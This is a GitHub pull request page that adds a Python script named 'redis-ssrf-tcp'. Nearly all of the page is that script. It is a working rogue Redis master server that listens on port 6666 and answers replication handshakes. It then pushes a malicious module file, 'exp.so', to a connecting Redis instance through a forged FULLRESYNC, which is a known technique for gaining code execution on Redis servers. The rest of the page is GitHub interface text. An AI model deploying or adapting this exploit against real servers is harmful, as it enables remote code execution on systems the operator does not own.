Create redis-ssrf-tcp #2

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Syzygy-K wants to merge 1 commit into xmsec:master from Syzygy-K:patch-1

Open

Create redis-ssrf-tcp #2

redis-ssrf-tcp

-Original file line number
+Diff line change
@@ -0,0 +1,70 @@
+    #!/usr/local/bin python
+    # coding=utf8
+    import socket
+    import time
+    CRLF = b"\r\n"
+    payload = open("exp.so", "rb").read()
+    exp_filename = "exp.so"
+    def redis_format(arr):
+        global CRLF
+        redis_arr = arr.split(" ")
+        cmd = b"*" + str(len(redis_arr)).encode()
+        for x in redis_arr:
+            if isinstance(x, str):
+                x_bytes = x.encode('utf-8')
+            else:
+                x_bytes = x
+            cmd += CRLF + b"$" + str(len(x_bytes)).encode() + CRLF + x_bytes
+        cmd += CRLF
+        return cmd
+    def redis_connect(rhost, rport):
+        sock = socket.socket()
+        sock.connect((rhost, rport))
+        return sock
+    def send(sock, cmd):
+        sock.send(redis_format(cmd))
+        print(sock.recv(1024).decode("utf-8"))
+    def RogueServer(lport):
+        global CRLF
+        global payload
+        flag = True
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.bind(("0.0.0.0", lport))
+        sock.listen(10)
+        clientSock, address = sock.accept()
+        print("\033[92m[+]\033[0m Accepted connection from {}:{}".format(address[0], address[1]))
+        while flag:
+            data = clientSock.recv(1024)
+            if not data:
+                break
+            if b"PING" in data:
+                result = b"+PONG" + CRLF
+                clientSock.send(result)
+                flag = True
+            elif b"REPLCONF" in data:
+                result = b"+OK" + CRLF
+                clientSock.send(result)
+                flag = True
+            elif b"PSYNC" in data or b"SYNC" in data:
+                result = b"+FULLRESYNC " + b"a" * 40 + b" 1" + CRLF
+                result += b"$" + str(len(payload)).encode() + CRLF
+                result += payload
+                result += CRLF
+                clientSock.send(result)
+                print("\033[92m[+]\033[0m FULLRESYNC ...")
+                flag = False
+        print("\033[92m[+]\033[0m It's done")
+        clientSock.close()
+        sock.close()
+    if __name__ == "__main__":
+        lport = 6666
+        RogueServer(lport)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Create redis-ssrf-tcp #2

Uh oh!

Diff view

Diff view

There are no files selected for viewing

Create redis-ssrf-tcp #2

Are you sure you want to change the base?

Uh oh!

Create redis-ssrf-tcp #2

Uh oh!

Uh oh!

Diff view

Diff view

There are no files selected for viewing